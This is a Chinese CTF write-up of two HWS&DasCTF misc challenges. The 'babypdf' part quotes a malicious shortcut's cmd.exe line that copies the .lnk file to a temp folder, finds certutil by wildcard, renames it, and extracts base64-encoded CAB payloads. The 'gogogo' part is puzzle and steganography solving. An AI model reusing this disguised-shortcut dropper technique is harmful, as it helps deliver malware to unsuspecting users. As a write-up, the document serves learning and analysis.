babypdf 附件是一个快捷方式,但是打开是可以成功的看到pdf的,这就肯定是从外面加载进来的
看一下目标
%SystemRoot%\system32\cmd.exe /c copy "20200308-sitrep-48-covid-19.pdf.lnk" %tmp%\\g4ZokyumBB2gDn.tmp /y&for /r C:\\Windows\\System32\\ %i in (*ertu*.exe) do copy %i %tmp%\\msoia.exe /y&findstr.exe "TVNDRgAAAA" %tmp%\\g4ZokyumBB2gDn.tmp>%tmp%\\cSi1r0uywDNvDu.
在tmp目录下找到g4ZokyumBB2gDn.tmp
有两段base64
文章图片
上下两段解出来都是MSCF文件头,是后缀为cab的归档文件
文章图片
第一个打不开,第二个打开出现了他加载的pdf
文章图片
然后再tmp文件里面找到了这个
文章图片
hex解密后,xor1得到了flag
文章图片
gogogo 【比赛wp|[HWS&DasCTF]misc】拿到手,有一堆拼图
文章图片
一共是256张拼图,是16*16的
magick montage *.png -tile x16 -geometry +0+0 flag.png
文章图片
再用gaps跑拼图
文章图片
得到密码:3e8f092d4d7b80ce338d6e238efb01,还不知道干啥的,先放着
然后分析镜像文件,找到了一个压缩包,dump出来
文章图片
发现是有密码的,用上面拼图得到的密码解开,是一个png
但是有两个文件头,删去一个即可
先拿去Stegsolve分析一下,貌似LSB有点东西,zsteg分离出一个png
文章图片
文章图片
xor,比较都没发现啥东西,估计是迷惑人的
然后就分析这个码,一开始以为是二维码,想着怎么修复,但是发现不太现实
文章图片
后来换了个思路,可能不是二维码,找到了一个azteccode,刚好中间是固定的
文章图片
扫码得到flag:flag{fbab8380-a642-48aa-89b1-8e251f826b12}
推荐阅读
- 比赛wp|[VNCTF2022]部分wp
- 代码审计|[代码审计]ThinkPHP 5.0.x 变量覆盖导致的RCE分析
- 代码审计|[代码审计]yii2 反序列化漏洞分析
- Delphi|如何准备迎接新版本Embarcadero RAD Studio Delphi、C++Builder 11
- Delphi|RAD Studio Delphi C++ Builder 2020年11月开发路线图PPT(研发Delphi WebAssembly编译器)
- 开发语言|C++ Builder与Visual C++孰优孰劣
- 数据结构|离散化算法
- 网络|2022 年顶级网络安全专家最爱用的10大工具
- android|android studio python3开发环境_Android Studio 学习笔记 - 开发环境的架设